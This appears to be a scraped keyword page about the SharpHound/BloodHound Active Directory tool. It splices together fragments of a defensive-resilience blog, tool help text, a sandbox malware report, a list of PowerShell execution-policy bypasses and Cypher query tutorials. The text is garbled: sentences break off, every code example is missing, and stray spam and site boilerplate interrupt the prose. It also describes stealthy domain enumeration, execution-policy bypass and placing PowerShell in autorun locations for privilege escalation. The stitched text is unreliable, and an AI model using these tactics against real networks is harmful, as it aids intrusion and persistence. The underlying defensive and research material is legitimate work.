Note: This is the second in a two-part blog series. This companion blog post covers the more technical, prescriptive tactics on executing the resilience methodology. Context is provided where appropriate. For full context, see the first blog post in the series here. Intro and Background. After releasing BloodHound at DEFCON 24, we and several others realized that while BloodHound is a great tool for attackers, its potential applications as a defensive tool are even more compelling.

In the first blog post, we covered the high level strategy for how to unlock some of that power, which we call the Active Directory Adversary Resilience methodology. Phase 1: Enumerate Attack Paths. After downloading SharpHound. This will collect the local admin group memberships from each reachable computer in the domain, Active Directory security group memberships, domain trusts, and will also perform one loop of user session collection. SharpHound will write CSV files to your current working directory.

Phase 2: Analyze Attack Paths. There are a few options for downloading and installing the analysis tools, Neo4j and the BloodHound UI. We also have a getting started section on the BloodHound wiki here. Baixar dayan de alencar interface will automatically parse the CSVs and load them into the Neo4j database.

Once your data is in the Neo4j database, open up BloodHound, which will by default show you all the effective members of the domain admins group. Instead, seek to identify the patterns of behavior and privileges that contribute to the exposure of the Domain Admin users. For instance, by clicking on the Domain Admins group, we can see lots of information about that group, including the number of user sessions that exist for users in that group:.

If we click the number, the BloodHound UI will graph out the computers with sessions for members of the Domain Admins group:. Further, you can analyze the total count of effective local admins across those systems.

Using the BloodHound interface, you could analyze each system one at a time, or at the Neo4j web console you can return a list of those computers, along with the total number of effective admins each computer has.

The Cypher query to do this is:. We can also measure just how exposed the Domain Admin users are to the rest of the environment. Phase 3: Generate Resilience Hypotheses. In the first blost post, we decided to test the effectiveness of the following hypothesis:.

In Cypher, we can discover all of the systems where Domain Admins were logged on, where those systems were not Domain Controllers:. Or, we can instead return a set of paths and render those paths in the BloodHound UI:. In Cypher, we can efficiently remove those edges by modifying the original query, this time to delete the offending edges.

At this point you may want to create a copy of the graph database so that you can go back to the original copy if necessary:. Conclusion and Future Work.GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Skip to content. Permalink Dismiss Join GitHub today GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together. Sign up. Branch: master. Find file Copy path. Raw Blame History. Runs the BloodHound C Ingestor using reflection. The assembly is stored in this file. Using reflection and assembly.

SharpHound: Target Selection and API Usage

Parameters are converted to the equivalent CLI arguments. The appropriate function. Specifies the CollectionMethod being used. Possible value are:. Group - Collect group membership information. LocalGroup - Collect local group information for computers. LocalAdmin - Collect local admin users for computers.

RDP - Collect remote desktop users for computers. Session - Collect session information for computers. SessionLoop - Continuously collect session information until killed. Trusts - Enumerate domain trust data. LoggedOn - Collects session information using privileged methods needs admin! ObjectProps - Collects node property information for users and computers.

This can be a list of comma seperated valued as well to run multiple collection methods! Use stealth collection options, will sacrifice data quality in favor of much reduced. Specifies the domain to enumerate. If not specified, will enumerate the current.One of the most common questions we get from BloodHound users is related to how collection is done, as well as what targets are selected for different collection methods.

The SharpHound collector has several discrete steps which run simultaneously to collect different data necessary for the graph. Local Admin Collection is done using two different methods, depending on if the stealth option is specified. Local admin collection without the stealth option will first query Active Directory for a list of computers. The list of computers is passed to the enumeration runner which reaches out to each computer and does the following actions:. The files are processed to determine which computers these GPOs are applied too.

Session collection is the same regardless of if stealth is specified or not. However, BloodHound exposes two different methods of querying session information for computers.

Both methods start by checking for portbut then diverge. An important distinction with the NetSessionEnum API call is that it does not allow you to directly query a system to ask who is logged on. Instead, it allows you to query a system for what network sessions are established to that system and from where. Network sessions are created when network resources, such as a file share, are accessed. A good example is mounted home drives that reside on the domain controller. The fourth parameter of the API call is the level of the API call, with 10 being the only level that gives the data necessary for BloodHound in an unauthenticated manner.

Running this against a domain controller with a mounted shared drive will give you results similar to this:. This is frequently the reason why you might not see logon sessions that you know exist. It is also important to note that the username parameter does NOT have a domain associated with it, which means that session information has an element of guesswork involved. The LoggedOn collection method is a much more precise collection method that returns session information by asking computers who is actually logged in to the system.

The caveat is that this level of collection requires administrative privileges on hosts that you want to collect data from. This session collection is ideal for defenders, or for additional data collection after getting Domain Admin.

The LoggedOn collection method uses two different methods to collect data. Running this against a system results in data like this:.This website uses cookies to enhance your browsing experience. Please note that by continuing to use this site you consent to the terms of our Data Protection Policy. Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details. Loading content, please wait Toggle navigation. Generic Link Twitter E-Mail.

External Reports VirusTotal. Risk Assessment. Fingerprint Queries kernel debugger information Reads the active computer name Reads the cryptographic machine GUID Evasive Marks file for deletion Possibly tries to implement anti-virtualization techniques Tries to sleep for a long time more than two minutes. This report has 8 indicators that were mapped to 7 attack techniques and 6 tactics.

View all details. Persistence Hooking 1. Download as CSV Close. EXE" "SharpHound. DLL" "SharpHound. All Details:.

sharphound example

Filename SharpHound. Visualization Input File PortEx. Classification TrID NET, Mono, etc. EXE Win64 Executable generic 9. SCR Windows screen saver 5. EXE Win32 Executable generic.

NetSPI Blog

File Imports mscoree. Tip: Click an analysed process below to view more details. Contacted Hosts No relevant hosts were contacted. ET rules applied using Suricata.

This program cannot be run in DOS mode. Format is 0d0h0m0s or any variation of this. Check your values for CollectionMethods! Check for trailing backslashes! ComputerFile detected! Debug Mode activated! Exception in Domain Searcher. Exiting session loop as LoopEndTime has passed.By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems.

The PowerShell execution policy is the setting that determines which type of PowerShell scripts if any can be run on the system. Instead, it was intended to prevent administrators from shooting themselves in the foot.

Including a few that Microsoft has provided. He provides a nice overview. Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:. To view a list of them use the command below. In the examples below I will use a script named runme.

When I attempt to execute it on a system configured with the default execution policy I get the following error:. Ok — enough of my babbling — below are 15 ways to bypass the PowerShell execution policy restrictions. Copy and paste your PowerShell script into an interactive console as shown below. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

This technique does not result in a configuration change or require writing to disk. This technique does not result in a configuration change, but does require writing your script to disk. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber. Use the Command Switch This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console.

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations like the all users startup folder to help during privilege escalation.

The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long. This is a fun option that I came across on the Obscuresec blog. Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs. Finally,run it using the command below:.In the previous blog post, we focused on SharpHound from an operational perspective, discussing some of the new features, as well as improved features from the original ingestor.

In the previous versions of the BloodHound ingestor, and the majority of the tools released, communication with Active Directory is done using the DirectorySearcher class in the System. ActiveDirectory namespace. Protocols namespace. DirectorySearcher provides convenience and abstraction, removing the need to handle things like paging, but at the cost of adding ADSI and COM overhead to processing and networking.

This results in more traffic, as well as lower performance overall. In a test environment with aboutusers, the pure LDAP method of enumeration took approximately one minute less to retrieve all the data. In this test, the data was not manipulated in any way either, so the actual performance increase is likely slightly higher.

sharphound example

The DirectoryServices. This should help avoid simple detection from directory enumeration. Another interesting feature is the addition of site searching for Domain Controllers. Previously, we would use the primary domain controller PDC for the domain you were enumerating to grab data. With the new changes, SharpHound will query for your nearest Domain Controller. One of the most important changes made in SharpHound was the addition of caching.

In the PowerShell ingestor, there was a small amount of in-memory caching in different parts of the ingestion process, mainly in the group membership enumeration. A large portion of the resolution done during enumeration is resolving SIDs, so caching this greatly reduces the number of network requests made. Data is stored in ConcurrentDictionaries, allowing thread-safe access to the data.

The cache file is generated using the wonderful protobuf project from Google, implemented in the protobuf-net package on nuget. This gives us very fast loading and writing of the cache file, which is essential to keep startup time minimal. Caching has also been added on a per-run basis to several other parts of enumeration.

DNS resolution is also cached locally. This is a feature that will be particularly useful for users of BloodHound outside the US on localized domains. This API call allows you to provide a name for a group you wish to query on a remote host. Obviously this breaks on localized domains. You can find the paltry documentation for this library here. In this example, the system is part of the testlab.

In the interest of brevity, the calls to close handles have been stripped out. Believe it or not, the function actually does more here, even though we actually have all the info we need at this point.

Essentially, the function calls a large number of completely unnecessary network calls for our purposes. The RID for the local administrators group is always This is a significantly reduced number of queries being performed to accomplish the same task. Even if the Administrators group is renamed to, lets say, Super Ultra Mega Awesome UsersSharpHound will have no trouble querying this group directly and getting the necessary data back.

The reduction in network overhead is another awesome side effect, as any reduction in the network hit from admin enumeration will eventually result in significant decrease overall, due to the repeated nature of the queries. The full code of the replacement local administrator function can be found in the SharpHound repository here. Each step would wait until completion to move onto the next step. Group enumeration would start and finish first, followed by the next steps in the process.

By only requesting the list of AD object and properties once, we remove a large portion of LDAP overhead incurred by requesting the same objects and properties multiple times.One of the most overlooked features of BloodHound is the ability to enter raw Cypher queries directly into the user interface.

However, with a bit of work, using raw Cypher queries can let you manipulate and examine BloodHound data in custom ways that will help you further understand your network or identify interesting relationships. Because Neo4j is not a relational database, but a graph database, the method of querying data requires its own syntax. Cypher is a way for a user to describe what they want to do in an intuitive manner, or as the Neo4j developers describe it, using ASCII art.

On the backend, the BloodHound user interface uses Cypher to interact with the database to query data or insert new data. Everything in the Neo4j database is represented using common terms from graph theory, particularly edges and nodes. In the BloodHound database, a node can represent one of the following objects in an Active Directory environment:.

Nodes represent discrete objects that can be acted upon when moving through an environment. The other part of the graph is edges. Edges represent relationships between nodes.

sharphound example

In the BloodHound database, edges represent the following relationships:. Edges represent the actions necessary to act on nodes.

Together, edges and nodes create the paths that we use in BloodHound in order to demonstrate how different permissions in Active Directory can be abused to get to our target. Each variable in the Cypher query is defined using an identifier, in this case the following ones: B,A,R.

HackPlayers🦹‍♂️Evil WinRm PowerShell Remoting🦹‍♂️from Linux to Windows?

The identifier for variables can be anything you want, including entire words, such as groups. In Cypher queries, nodes are specified using parentheses, so B and R are nodes in the sample query above. Relationships are specified using brackets, so in this example A represents relationships. The dashes between the nodes and relationships can be used to specify direction. Relationships in BloodHound always go in the direction of compromise or further privilege, whether through group membership or user credentials from a session.

Finally, the RETURN statement instructs the database to return all the items matched with the corresponding variable names.

sharphound example

This query is a bit more refined than the previous one. By using labels on both nodes and edges, we can make our query a lot more specific. We also pre-assign the variables n and m and give them labels to make the query easier to read. We added a length modifier as well to the relationship. In simple terms, give me any users that are a member of a group up to three links away. When we get p back, it will contain the result of each path it can find that matches our pattern we asked for.

In this query, we add a few more elements to our previous ones. LOCAL by specifying the name parameter. We also use the shortestPath function.

Using this function, we ask Neo4j to give us the shortest path it can find between each node n and the Domain Admins group. We also removed the limit on how many hops the database can search. By not specifying an upper limit, the database will go as many hops as possible to find a path.